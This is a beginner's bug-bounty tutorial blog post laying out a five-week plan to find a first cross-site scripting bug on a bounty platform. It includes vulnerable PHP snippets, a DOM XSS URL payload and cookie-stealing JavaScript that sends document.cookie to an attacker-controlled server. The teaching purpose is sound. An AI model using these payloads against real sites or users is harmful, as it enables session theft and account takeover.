Bug bounties. Five Weeks To Your First Bug


~ 7 minute read
Crafted : 6 months ago Updated : 5 months ago
Tags:
#guide #xss #fiveweekstofirstbugchallenge #bugbounty #beginner #stayhome

Hello luves, 

this post is just a mirror to my five weeks to your first bug challenge. A mini seri on getting into bug bounty hunting. this guide aim to help absolute beginners .

 

Table of contents

 

 

Introduction

What it really takes?

Becoming a bug bounty hunter is a relatively straight forward process, your favorite terminal, and execute this.

$ make me a BugHunter

 

Unfortunately, that's not the case . Doing bug bounties is hard labor. Its result based, and when you are a beginner, there is a high chance of duplicate bugs, which means someone else found the same bug as you. Which means you make $0 doing a lot of work!

But Hey! Don't give up hope yet; this guide is all about reporting your very first vulnerability in 5 weeks ! you have to spend 3 hours per day. It will take you ~100 hours. This guide only focuses on finding your first cross-site-scripting vulnerability. Why cross-site-scripting? Because it's the most common vulnerability, and it's easy to exploit.

 

How to begin?

 

This guide assumes you have a primary computer, software, and info-sec skills. You at least know theoretically what vulnerability and an exploit mean. And most importantly, you have a curiosity that drives you nuts to know more.

Besides time which is the most critical factor, you have to clear your head and change your mindset from making quick cash to learn and practice what you've learned.

 

Due to its nature bug bounties aren't for everyone. The likelihood of burnouts and imposter syndrome is higher than many other tech jobs.

The best way to prevent thse issues is by taking baby steps. Don't force yourself to get results, relax, sit back, and enjoy the journey.

 

 

 

What it really bug bounty?

A bug bounty program is a deal offered by many websites, organisations and software developers by which individuals can receive recognition and compensation[1] for reporting bugs, especially those pertaining to security exploits and vulnerabilities.

These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse. Bug bounty programs have been implemented by a large number of organisations, including Mozilla,[2][3] Facebook,[4] Yahoo!,[5] Google,[6] Reddit,[7] Square,[8], Microsoft.[9][10] , and the Internet bug bounty[11].

Well said, wiki. In straightforward words, you will join your favorite team as a freelance security researcher. But you will only get paid if you find an issue with a security impact.

Now, if you have what it takes, And you are determined to make this path, Let us begin!

 

Week One: Preparation And Recon

 

The first week is all about the preparation you can google for bug bounty platforms and find one you like. Here are a few popular ones.

 

Open these sites and read their docs, rules to get familiar with the platform itself. Next, head over to program directory on each and check which software you enjoy working on it; is there any program in the list you are using as a user? That can significantly help you, also register a user on your chosen platform. Make sure you understand some programs offer money, and some don't those who are not paying are easier targets to sharpen your skill and report your first valid vulnerability.

 

Read:

Watch:

Practice:

  • Try to find as much as assets (sub-domains, urls, etc) belong to the target you've chosen.

 

By the end of this week, you should be able to use the burp suite for intercepting HTTP and https also; you should have a better understanding of the recon process

 

 

Week Two: Understanding Cross-site Scripting

 

Cross-site scripting, by far, is the most common issue to be found. It can be a dead mind-blowing or straightforward complex. The whole idea of cross-site scripting attacks is injecting javascript code to the client browser, which will execute on the client browser. It is way more powerful, popping an alert most of the time and can lead to full account takeover in many cases. This issue is the very first issue you'll find. The most comfortable variant is the reflected one. The basic idea is program trust user input and reflects in on user. To help you illustrate the idea, here is a simple code written in PHP.

 

<?php​

$xss = $_GET['XSS']; // user input
echo $xss; // vulnerable no sanitisation
​echo htmlentities($xss, ENT_QUOTES); // Not vulnerable

​?>

 

Next Is stored cross-site scripting, the only difference with reflected one is data is stored in some database and later on revealed to use. Here is how the code at the backend lookalike.

 
...
$SQL = "select title from user where id=10"; // image this return <script>alert(0)</script>

​$result = $conn->query($SQL);echo $result; // it will reflect <script>alert(0)</script> to user​
...

so in this case we used following string for our title.

<script>alert(0)</script>

 

By the end of this week, you should be able to find and exploit reflected and stored XSS vulnerability! Good job already! you are unstoppable!

 

Week Three: Exploiting Cross-Site-Scripting issues

Now that you learn how to find reflected XSS it's to to exploit your first vulnerability as well.It's not easy to how to exploit these issues because it really depends on target. but usually you want to steal session cookies. these session cookies are used to identify users on backend so if you can steal these cookies you can steal target identity which makes this bug very serious. after you are able to run arbitrary javascript code here are some ways you can steal session cookies.

 

/ We usually use javascript to exploit cross-site-scripting 

// this is where we can find cookies 
document.cookie

// we want to send these cookies to our controlled server

// First way is to redirect user to our controlled server
document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;


// classic XMLHttpRequest available on all browsers
var request = new XMLHttpRequest();
    request.open("GET", "http://127.0.0.1:8000/?c="+document.cookie, true);
    request.send()
    
    
    
// One liner on modern browsers 
fetch('"http://127.0.0.1:8000/?c="+document.cookie);

 

 

remember its just javascript code so you can get creative here. if you are not familiar at all with javascript don't worry resources are just below.

Read:

Watch:

Practice:

At the end of this week, you should be able to understand the basics of javascript, and you should be able to write a cookie stealing proof of concepts.

 

Week Four: DOM-based cross-site scripting

 

Alright, now you are more comfortable with reading and writing the necessary javascript. You can use your newly learned knowledge not only to exploit cross-site scripting issues but also to find a new variant of XSS called DOM XSS. Imagine you found the following code on while reading your target javascript.

//let's say here is the code located at http://127.0.0.1/xss.html

var pos=document.URL.indexOf("xss=")+4;
document.write(document.URL.substring(pos,document.URL.length));

this can be simply exploited.

http://127.0.0.1/xss.html#xss=<script>alert(document.cookie)</script>

What? it's so simple the javascript tries to receive everything after # sign, and after four characters because we want to exclude "XSS=" next it will reflect it to the page using write function.

document.write()

 

So this is it very similar to our backend example, but it's on client-side code. The impact is high as the previous one and can be exploited like past issues.

Watch:

Practice:

by end of this week you should be able find and exploit simple DOM based XSS vulnerabilities.

 

Week Five: Exploiting Real-World Targets

 

We are facing a sad pandemic nowadays. If you are in quarantine, you can use your extra time and report your first issue.

Stay focus. Don't try even to learn more about other issues; focus only on XSS if you want to learn more about XSS. Imagine you have not learned it yet before you submit your first valid XSS issue. Cut all the noises and juicy information around you focus only on cross-site scripting.

 

Alright, you made it this far, now its time to put recently gained knowledge to work. Let's say you choose to work the "AWESOME" program because you love "AWESOME" tools ! Go to their program page on your chosen bug bounty platform. Read the scope carefully and make sure every single item you are testing is the scope of bug bounty programs and make sure XSS bugs are acceptable (it is in 99% of programs). Now, look at each application you found in scope, try to explore as much as you can, and try to find as endpoints possible. Read the javascript and try to trace the user input. Try to inject your code into forms and files.

This week you practice everything you learned on your target if you started with a paid program and can't find anything move on to another target which offers swag and points, but your end goal here is to find and report your first "valid" XSS vulnerability can be DOM, Stored, OR reflected.

Read:

Use:

 

 

Conclusion

There are so many vulnerability types, which makes it very hard to create series like this on each of them, but know you already have a working methodology to deal with new issues. You spend some time to learn and practice the issue then take your gained knowledge and test real-world targets.

‌ I can't wait to see you've found and reported your first XSS vulnerability.  if you have done it contact me !

 

#FiveWeeksToFirstBountyChallenge

Assist me:
Buy Me a Coffee at ko-fi.com